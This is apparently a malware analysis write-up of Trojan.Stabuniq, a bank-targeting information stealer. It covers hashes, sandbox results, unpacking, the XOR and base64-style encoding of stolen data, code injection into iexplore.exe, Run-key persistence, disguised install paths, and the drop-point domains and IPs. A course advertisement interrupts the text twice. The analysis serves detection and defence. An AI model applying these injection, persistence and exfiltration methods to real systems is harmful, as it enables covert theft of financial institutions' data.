Trojan.Stabuniq was discovered very recently by Symantec.

This type of malware appears to be targeting financial institutions (especially U.S. banks).

Stabuniq is fundamentally an information-stealing Trojan and has already been found in many proxy servers, mail servers, gateway servers, etc. etc. of banking firms and credit unions, in addition to home PCs.

With a great deal of probability, this malware has been distributed through spam emails and malicious website.

Although the version analyzed is not very complex in all its instructions, Stabuniq has attracted interest because it is widely accepted that the author (or authors) were, at this stage, only gathering information for a future and more impactful attack.

In this document are described with a high level of detail, the instructions executed by Stabuniq during the infection process of a victim system.

Some methods will be suggested for identifying the malware and cleaning systems already affected from a user point of view.

Preliminary Analysis

The analyst has initially submitted the malware to a multi-engine anti-malware scan. Results are shown below:

Agnitum Trojan.Injector!6JAeCvCTdAg
AhnLab-V3 Backdoor/Win32.Ruskill
AntiVir TR/Graftor.27095.3
Antiy-AVL -
Avast Win32:Ruskill-FQ [Trj]
AVG Dropper.Generic6.CAIC
BitDefender Gen:Variant.Graftor.27095
ByteHero -
CAT-QuickHeal -
ClamAV -
Commtouch -
Comodo Unclassified Malware
DrWeb Trojan.Packed.22607
Emsisoft Gen:Variant.Graftor.27095 (B)
eSafe -
ESET-NOD32 a variant of Win32/Injector.RVT
F-Prot -
F-Secure Gen:Variant.Graftor.27095
Fortinet W32/Injector.RVT!tr
GData Gen:Variant.Graftor.27095
Ikarus Worm.Win32.Dorkbot
Jiangmin -
K7AntiVirus Trojan
Kaspersky Backdoor.Win32.Ruskill.hvd
Kingsoft Win32.Troj.Undef.(kcloud)
Malwarebytes Backdoor.Bot.wpm
McAfee Generic.dx!bg3a
Panda Generic Malware
Symantec Trojan.Stabuniq
TrendMicro TROJ_STABUNIQ.A
VBA32 -

Despite a relatively short time of discovery, it’s possible to note a high threat identification rate.

The next step was to obtain much information as possible about the executable.

The analyst then submitted malware to some useful tools and recovered the following:

MD5 f31b797831b36a4877aa0fd173a7a4a2
SHA1 17db1bbaa1bf1b920e47b28c3050cbff83ab16de
File size 77.5 KB ( 79360 bytes )
File name malware.exe
File type Win32 EXE
ssdeep
1536:3XBp/wqLHinJ8i7zY8QiLBTaM4gTKSb4JjTKT7SEKla:3zIqLHG8GzV9laMz4h+SZl
ExifTool
MIMEType application/octet-stream
Subsystem Windows GUI
MachineType Intel 386 or later, and compatibles
TimeStamp 2012:03:21 23:43:39+00:00
FileType Win32 EXE
PEType PE32
CodeSize 12800
LinkerVersion 6.0
EP 0xf570
InitializedDataSize 9216
SubsystemVersion 4.0
ImageVersion 0.0
OSVersion 4.0
UninitializedDataSize 0
PE Structural Information
Compilation timedatestamp 2012-03-21 23:43:39
Target machine 0x14C
Entry point address 0xf570
PE Sections
Name VA VS RS Entropy MD5
.text 61440 12390 12800 6.47 944a871b5f37d479635b1a6f75c37714
.rdata 77824 2298 2560 5.12 0e3b191fbe081a8bc584ff26f63a6351
.data 81920 4892 1536 2.65 eef3195796204b78bb78a2b06241943d
.reloc 90112 1424 1536 5.58 a507284daebb8791920dc705650e19ab
PE Import
KERNEL32.dll GetLastError

HeapFree

GetStdHandle

EnterCriticalSection

LCMapStringW

SetHandleCount

lstrlenA

GetModuleFileNameW

GetOEMCP

GetEnvironmentStringsW

HeapDestroy

ExitProcess

TlsAlloc

VirtualProtect

GetModuleFileNameA

RtlUnwind

LoadLibraryA

FreeEnvironmentStringsA

GetCurrentProcess

GetEnvironmentStrings GetCommandLineW

GetCPInfo

UnhandledExceptionFilter

MultiByteToWideChar

FreeEnvironmentStringsW

GetCommandLineA

GetProcAddress

WideCharToMultiByte

GetStringTypeA

GetModuleHandleA

WriteFile

GetStartupInfoA

VirtualFree

GetACP

HeapReAlloc

GetStringTypeW

GetCurrentThreadId

SetThreadContext

TerminateProcess

LCMapStringA

InitializeCriticalSection

HeapCreate

CreateProcessW

TlsGetValue

GetFileType

TlsSetValue

HeapAlloc

GetVersion

VirtualAlloc

SetLastError

LeaveCriticalSection
GDI32.dll StartDocA
PEiD
Armadillo v1.71

It’s possible to see that PEiD has discovered some kind of compression/encoding of original instructions using the tool Armadillo v1.71. We can predict a phase in which the analyst will recover the original executable to make subsequent code analysis easier.

Dynamic Analysis

The analyst has performed a dynamic analysis of the executable in a controlled environment. This step allows us to observe the creation of new files in the victim system (the malware copies itself into the system under a different name and a different path), the deletion of the original executable launched, the interaction with specific registry keys to order to ensure its persistence even after reboots and the injection of code inside the iexplore.exe process. It was also possible to detect network activity to some domains identified as the drop points of information gathered by the malware.

* The following are results obtained:

Analysis Reason Analysis Subject
Filename malware.exe
Command Line C:malware.exe
Process-status at analysis end dead
Exit Code 0

Dependency:

malware.exe (Analysis Subject)

iexplore.exe (Started by malware.exe)


issch.exe (Started by iexplore.exe)

Load-Time Dlls
Module Base Address Size
C:WINDOWSsystem32ntdll.dll 0x7C900000 0x000AF000
C:WINDOWSsystem32kernel32.dll 0x7C800000 0x000F6000
C:WINDOWSsystem32GDI32.dll 0x77F10000 0×00049000
C:WINDOWSsystem32USER32.dll 0x7E410000 0×00091000
Run-Time Dlls
Module Base Address Size
C:WINDOWSsystem32ADVAPI32.DLL 0x77DD0000 0x0009B000
C:WINDOWSsystem32RPCRT4.dll 0x77E70000 0×00092000
C:WINDOWSsystem32Secur32.dll 0x77FE0000 0×00011000

File Activity of malware.exe:

File Read
C:malware.exe
Memory Mapped Files
C:Program FilesInternet ExplorerIEXPLORE.EXE
C:Program FilesInternet Exploreriexplore.exe
C:WINDOWSWinSxSx86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83comctl32.dll
C:WINDOWSWindowsShell.Manifest
C:WINDOWSsystem32Apphelp.dll
C:WINDOWSsystem32SHELL32.dll
C:WINDOWSsystem32WS2HELP.dll
C:WINDOWSsystem32comctl32.dll
C:WINDOWSsystem32psapi.dll
C:WINDOWSsystem32urlmon.dll
C:WINDOWSsystem32wininet.dll
C:WINDOWSsystem32ws2_32.dll
C:WindowsAppPatchsysmain.sdb

Process Activity of malware.exe:

Process Created
C:Program FilesInternet Exploreriexplore.exe
Remote Threads Created To
C:Program FilesInternet Exploreriexplore.exe
C:Program FilesInternet Exploreriexplore.exe

Registry Activities of malware.exe

Registry Key Created
-
Registry Key Modified
-

File Activity of iexplore.exe:

File Created
C:Program FilesAdobeUninstallissch.exe
Directories Created
C:Program FilesAdobeBin
C:Program FilesAdobeHelper
C:Program FilesAdobeInstaller
C:Program FilesAdobeUninstall
C:Program FilesAdobeUpdate
Memory Mapped Files
C:Program FilesAdobeUninstallissch.exe
C:WINDOWSWinSxSx86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83comctl32.dll
C:WINDOWSWindowsShell.Manifest
C:WINDOWSsystem32Apphelp.dll
C:WINDOWSsystem32RichEd20.dll
C:WINDOWSsystem32SHDOCVW.dll
C:WINDOWSsystem32ShimEng.dll
C:WINDOWSsystem32WININET.dll
C:WINDOWSsystem32WS2HELP.dll
C:WINDOWSsystem32psapi.dll
C:WINDOWSsystem32shell32.dll
C:WINDOWSsystem32ws2_32.dll
C:WindowsAppPatchsysmain.sdb

Registry Activities of iexplore.exe:

Registry Key Created
HKUS-1-5-21-842925246-1425521274-308236825-500SoftwareStability Software
Registry Key Modified
Key Name New Value
HKLMSoftwareMicrosoftWindowsCurrentVersionRun 9ed38398-
c8a7-44d9-
b6a9-06a7e1e3cccc
C:Program FilesAdobeUninstall
issch.exe
HKU.DEFAULTSOFTWAREMicrosoftWindowsCurrentVersionRun 9ed38398-
c8a7-44d9-
b6a9-06a7e1e3cccc
C:Program FilesAdobeUninstall
issch.exe

Network Activities of iexplore.exe:

Remote IP Local IP Event
205.234.252.212 192.168.1.2 HTTP [POST] /rssnews.php
75.102.25.76 192.168.1.2 HTTP [POST] /rssnews.php

*
Some of the information has been truncated for space reasons.

Bypassing Code Protection

Passing over some minor instructions executed at startup by the analyzed sample, it’s possible to focus only on those operations that are performed by malware in order to recover the set of the original packed code.

At a subroutine located at 0040F060, malware begins creation of new executable structure in his own address space through a dedicated loop. The image that follows shows a broad view of this:

VirtualProtect function call is performed to change the memory protection options for a length of 60040 bytes starting at address 00400040.

Malware at this point lands on 0040F218 where there is a new loop dedicated to BYTE – BYTE structure deobfuscation starting at address 00400040 based on previous VirtualProtect function parameters.

The following is a code snippet of what has just been said:

The analyst has therefore waited the conclusion of the deobfuscation cycle and has performed the dump of the memory region useful to carve the original executable as shown in image below, in accord with VirtualProtect function parameters.

Code Analysis

The code analysis was performed on the original executable just recovered. Before this, however, the analyst submitted it to a new multi-engine anti-malware scan and recovered some useful information about it. Results are shown below:

MD5 493d0816244d6b789ad4a4f43e9f8299
SHA1 793c668642fb44bf2562365297774b48b4a3402d
File size 60.0 KB ( 61440 bytes )
File name malware_dumped.exe
File type Win32 EXE
ssdeep
1536:fEy6TznQ6vsivKlUj8reE+9Px9yIINrkQcQSHphlVJMzlB:j6TbQqs+2Uj8reE+9Px9yDNIQc7TlVif
ExifTool
MIMEType application/octet-stream
Subsystem Windows GUI
MachineType Intel 386 or later, and compatibles
TimeStamp 2012:03:22 22:20:44+00:00
FileType Win32 EXE
PEType PE32
CodeSize 46080
LinkerVersion 6.0
EP 0x9d6f
InitializedDataSize 13312
SubsystemVersion 4.0
ImageVersion 0.0
OSVersion 4.0
UninitializedDataSize 0
PE Structural Information
Compilation timedatestamp 2012-03-22 22:20:44
Target machine 0x14C
Entry point address 0x00009D6F
PE Sections
Name VA VS RS Entropy MD5
.text 4096 45694 46080 6.02 b9c1c6ca34b96d513b9c41a7539a6009
.rdata 53248 3050 3072 5.27 8a15f2c3650eaac67a487af36c8d2a3f
.data 57344 9020 8192 4.35 1592942ae5088046046f7ecee26a8107
.rsrc 69632 928 1024 3.02 865e0cbf47a6126204b25ef786baa090
PE Import
MPR.dll WNetOpenEnumA, WNetEnumResourceA, WNetCloseEnum
urlmon.dll ObtainUserAgentString
ADVAPI32.dll GetUserNameA
KERNEL32.dll GetLastError, HeapFree, GetStdHandle, LCMapStringW, HeapCreate, GetSystemInfo, lstrlenA, GetModuleFileNameW, GetOEMCP, LCMapStringA, HeapDestroy, ExitProcess, VirtualProtect, GetVersionExA, LoadLibraryA, RtlUnwind, lstrlenW, FreeEnvironmentStringsA, GetComputerNameA, GetCurrentProcess, SizeofResource, GetEnvironmentStringsW, FreeEnvironmentStringsW, lstrcatA, LockResource, GetCommandLineW, GetCPInfo, UnhandledExceptionFilter, SetErrorMode, MultiByteToWideChar, MapViewOfFile, GetCommandLineA, lstrcatW, GetProcessHeap, lstrcpyW, WideCharToMultiByte, LoadLibraryW, GetStringTypeA, GetModuleHandleA, lstrcpyA, GetStartupInfoA, CreateMutexW, DeleteFileW, GetACP, HeapReAlloc, GetStringTypeW, GetProcAddress, TerminateProcess, GetEnvironmentStrings, GetModuleFileNameA, SetHandleCount, LoadResource, WriteFile, VirtualFree, CreateFileMappingA, Sleep, GetFileType, GetTickCount, HeapAlloc, GetVersion, FindResourceA, VirtualAlloc, SetLastError
SHELL32.dll SHGetFolderPathW
RPCRT4.dll UuidToStringW
ole32.dll CoCreateGuid
SHLWAPI.dll StrChrA
USER32.dll GetSystemMetrics

Multi-Engine Anti-Malware Scan:

Agnitum -
AhnLab-V3 Trojan/Win32.Stabuniq
AntiVir TR/Buniq.A.3
Antiy-AVL -
Avast Win32:Malware-gen
AVG PSW.Generic10.AZPY
BitDefender Trojan.Generic.8520333
ByteHero -
CAT-QuickHeal -
ClamAV -
Commtouch W32/FraudLoad.B.gen!Eldorado
Comodo Unclassified Malware
DrWeb Trojan.Buniq.2
Emsisoft -
eSafe -
ESET-NOD32 probably a variant of Win32/Spy.Agent.NYM
F-Prot W32/FraudLoad.B.gen!Eldorado
F-Secure Trojan.Generic.8520333
Fortinet W32/Bckdr.BS
GData Trojan.Generic.8520333
Ikarus -
Jiangmin -
K7AntiVirus Backdoor
Kaspersky HEUR:Trojan.Win32.Invader
Kingsoft -
Malwarebytes -
McAfee Artemis!493D0816244D
Panda Trj/CI.A
Symantec Trojan.Stabuniq
TrendMicro TROJ_GEN.R47CDLS
VBA32 Malware-Cryptor.Inject.gen

After retrieving this kind of information, the code analysis began.

Entry Point was at 00409D6F.

The first interesting set of instructions performed is a subroutine called at 00409DEE, designed to retrieve environment variables of the infected system.

The main activity of the malware however, begins at 00409E38, with the call at function _WinMain@16.

Malware goes to create “StabilityMutexString” mutex in order to check if a version of itself is already started…

and begins preparing the following system interaction with an in-memory copy of useful strings.

The malware retrieves strings about what will be…

  1. Domain Names representing the drop points of the information collected (sovereutilizeignty.com, benhomelandefit.com):

  1. Name of the page that will be contacted by malware (/rssnews.php):

  1. The first set of possible strings through the malware will compose the path to which it will copy itself (Java Quick Starter, InstallShield Update Service Scheduler, SoundMAX service agent, AcroIEHelper Module, GrooveMonitor Utility):

  1. Possible executable names where malware will copy itself to (jqs.exe, issch.exe, smagent.exe, acroiehelper.exe, groovemonitor.exe):

  1. The second set of possible strings through the malware will compose the path to which it will copy itself (Update, Bin, Uninstall, Helper, Installer):

After conducting these operations that are necessary for subsequent interactions, the sample goes to retrieve information about system like UserName, ComputerName, SystemInfo, Address, Active Processes, etc.

Based on the returning value of the GetVersionEx function, the malware is able to retrieve the version type of the operating system and Service Pack in use.

This is done by comparing the version number with hardcoded values.

Unless the result of the operation does not lead to identify a “Windows 7″ OS, the malware executes a mnemonic JMP to 0×401220 (end of subroutine); otherwise it continues the normal flow of operations expected which will lead in any case to the end of the function.

Based on the code analysis, the malware appears to be able to interact with the following operating systems:

– Windows 2000

– Windows XP

– Windows XP Professional x64

– Windows Server 2003

– Windows Home Server

– Windows Server 2003 R2

– Windows Server 2008

– Windows Server R2

– Windows 7

In our case Windows XP is identified.

The malware then goes on to perform active processes enumeration.

All the information gathered is going to generate the future HTTP POST request to domains previously shown.

An example of what was just said can be represented from following string:

sovereutilizeignty.com/rssnews.php?id=127.0.0.1&varname=Administrator&comp=EMANUELE-REM-PC… etc.etc.etc.

The only difference with the string just shown is that the malware performs the encoding of parameters (with a generated key) before making the HTTP request.

The first of these encoding subroutines is located at 0x40926F and is designed to return a string encoded with the following pseudo-code reversed algorithm:

For var1 = 0 to StringToEncode.Length

For var2 = 0 to Key.Length

Take single character of string to encoding starting at first.

Take character of key starting at first.

Want to learn more?? The InfoSec Institute Reverse Engineering course teaches you everything from reverse engineering malware to discovering vulnerabilities in binaries. These skills are required in order to properly secure an organization from today's ever evolving threats. In this 5 day hands-on course, you will gain the necessary binary analysis skills to discover the true nature of any Windows binary. You will learn how to recognize the high level language constructs (such as branching statements, looping functions and network socket code) critical to performing a thorough and professional reverse engineering analysis of a binary. Some features of this course include:

  • CREA Certification
  • 5 days of Intensive Hands-On Labs
  • Hostile Code & Malware analysis, including: Worms, Viruses, Trojans, Rootkits and Bots
  • Binary obfuscation schemes, used by: Hackers, Trojan writers and copy protection algorithms
  • Learn the methodologies, tools, and manual reversing techniques used real world situations in our reversing lab.

Perform XOR encoding of character of string to encode (for ex. 73h – s) with the character of key (for ex. 63h – c).

Move reading key of one character forward.

Loop

Move reading string of one character forward.

Loop

This is the entire code for this cycle:

The encoded string will be then passed to a subroutine located at 0x408DC7.

The second encoding function obtains correspondence between the characters of the xored string obtained from the function at 0x40926F, with a predefined set of hardcoded characters, and shown below (in simplified form) with the following pseudo-code:

For var=0 to String.Length

Take a character form string to encode starting at first.

Perform SAR instruction of character retrieved from string with hardcoded multiple of 2 (starting from 2). -> SAR ECX,(2,4,6,8)

Perform an AND instruction with the result of the previous operation and 3F.

Retrieve position of corresponding character in string

“ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/”.

Write new string.

Loop

Snippet of code of second encoding function:

At the end of procedure, a string like the following is obtained:

id=Pj04IT8hPyE&varname=fGBsY25t&comp=XEBMQ05NIj84OTlLSzg7…etc.etc.

Once this has been done, the malware comes to execute the code-injection into the C:Program FilesInternet Exploreriexplore.exe process.

This is done through CreateProcess

User View:

WriteProcessMemory

and ResumeThread functions.

Continuing with a wider view of the operations performed, the code injected goes at this point to create a copy of itself in a path generated by the combination of strings seen previously, to modify the registry keys to survive even after system reboot, and to execute HTTP POST requests to the drop points previously shown.

Malware Indicator

From a user point of view, the presence of “iexplore.exe” process running even if the browser is not currently in use, may suggest the presence of this type of malware or its variants.

Conclusions

  1. General function and functionality of the malware:

    Stabuniq is basically an information-stealing Trojan.

  2. Behavioral patterns of malware:

    The malware is able to inject its code into iexplore.exe process and run it silently to execute malicious actions. It sends out sensitive information via the HTTP protocol.

  3. Local system interaction:

    Malware can copy itself into one of the following path


%ProgramFiles%[FOLDER NAME ONE][FOLDER NAME TWO]acroiehelper.exe

%ProgramFiles%[FOLDER NAME ONE][FOLDER NAME TWO]groovemonitor.exe

%ProgramFiles%[FOLDER NAME ONE][FOLDER NAME TWO]issch.exe

%ProgramFiles%[FOLDER NAME ONE][FOLDER NAME TWO]jqs.exe

%ProgramFiles%[FOLDER NAME ONE][FOLDER NAME TWO]smagent.exe

The variable [FOLDER NAME ONE] may be one of the following

AcroIEHelper Module

GrooveMonitor Utility

InstallShield Update Service Scheduler

Java Quick Starter

SoundMAX service agent

The variable [FOLDER NAME TWO] may be one of the following

Bin

Helper

Want to learn more?? The InfoSec Institute Reverse Engineering course teaches you everything from reverse engineering malware to discovering vulnerabilities in binaries. These skills are required in order to properly secure an organization from today's ever evolving threats. In this 5 day hands-on course, you will gain the necessary binary analysis skills to discover the true nature of any Windows binary. You will learn how to recognize the high level language constructs (such as branching statements, looping functions and network socket code) critical to performing a thorough and professional reverse engineering analysis of a binary. Some features of this course include:

  • CREA Certification
  • 5 days of Intensive Hands-On Labs
  • Hostile Code & Malware analysis, including: Worms, Viruses, Trojans, Rootkits and Bots
  • Binary obfuscation schemes, used by: Hackers, Trojan writers and copy protection algorithms
  • Learn the methodologies, tools, and manual reversing techniques used real world situations in our reversing lab.

Installer

Uninstall

Update

Malware creates the following registry entries so that it runs every time Windows starts:

HKCUSoftwareMicrosoftWindowsCurrentVersionRun”[RANDOM GUID]” = “[FILE NAME]”

HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun”[RANDOM GUID]” = “[FILE NAME]”

HKU.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun”[RANDOM GUID]” = “[FILE NAME]”

  1. Network Behavior:

    The malware sends HTTP requests to 75.102.25.76 and 205.234.252.212. IP addresses.

  2. Propagation Methodology:

    The malware does not provide methods of self-propagation. Most likely carriers of infection can be identified in sending massive or targeted spam emails or by exploiting browsers vulnerabilities.

  3. Compiler type and country of origin:

Malware seems designed, or at least compiled, in the United States.

It was probably compiled with the Microsoft Visual C++.